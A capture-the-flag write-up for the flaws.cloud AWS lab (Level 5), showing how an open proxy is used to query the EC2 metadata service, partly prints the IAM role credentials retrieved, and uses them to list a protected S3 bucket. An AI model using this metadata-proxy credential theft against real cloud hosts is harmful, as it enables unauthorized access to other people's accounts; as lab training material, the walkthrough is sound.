Enumerating the Web Server

In the previous level, we identified the entry point for Level 5 as, http://level5-d2891f604d2061b6977c2481b0c8333e.flaws.cloud/243f422c/.

The webpage provides the Level 6 URL but it's incorrect as we need to access a sub-domain of it. Additionally, the page informs us that this web server is running a proxy and provides examples of how to access it.

Let's attempt to access the metadata service for EC2 and check if it has an EC2 Instance Profile attached.

curl http://4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud/proxy/169.254.169.254/latest/meta-data/iam/security-credentials/flaws

[snip]
"AccessKeyId" : "ASIA6GG7PSQGTRQJF23G",
  "SecretAccessKey" : "W0stF21iQdqSTwMSzZWBbK5E7ucenpQsSAUNPiPn",
  "Token" : "IQoJb3J
[snip]

Nice! So this EC2 has an Instance Profile called flaws. Let's check the credentials and verify they work.

aws --profile flaws5 sts get-caller-identity 
{
    "UserId": "AROAI3DXO3QJ4JAWIIQ5S:i-05bef8a081f307783",
    "Account": "975426262029",
    "Arn": "arn:aws:sts::975426262029:assumed-role/flaws/i-05bef8a081f307783"
}

We should be able to view the Level 6 website now using these credentials.

aws --profile flaws5 s3 ls level6-cc4c404a8a8b876167f5e70a7d8c9880.flaws.cloud
                           PRE ddcc78ff/
2017-02-26 19:11:07        871 index.html

Looks like we found the subdomain we needed and when navigating to the website, we're provided with access keys for Level 6.

Wrap-Up

In Level 5, we discovered a proxy running on the EC2 server. The proxy enabled us to query the EC2's metadata service and obtain credentials from its Instance Profile. Using these credentials we enumerated the Level 6 bucket, discovered the subdomain, and accessed the website which provided AWS access keys.

The Instance Metadata Service (IMDS) is a service that enables accessing details about an EC2 instance such as its networking info, security groups, IAM role credentials, etc. If not in use, it should be disabled. More details can be found in the AWS documentation.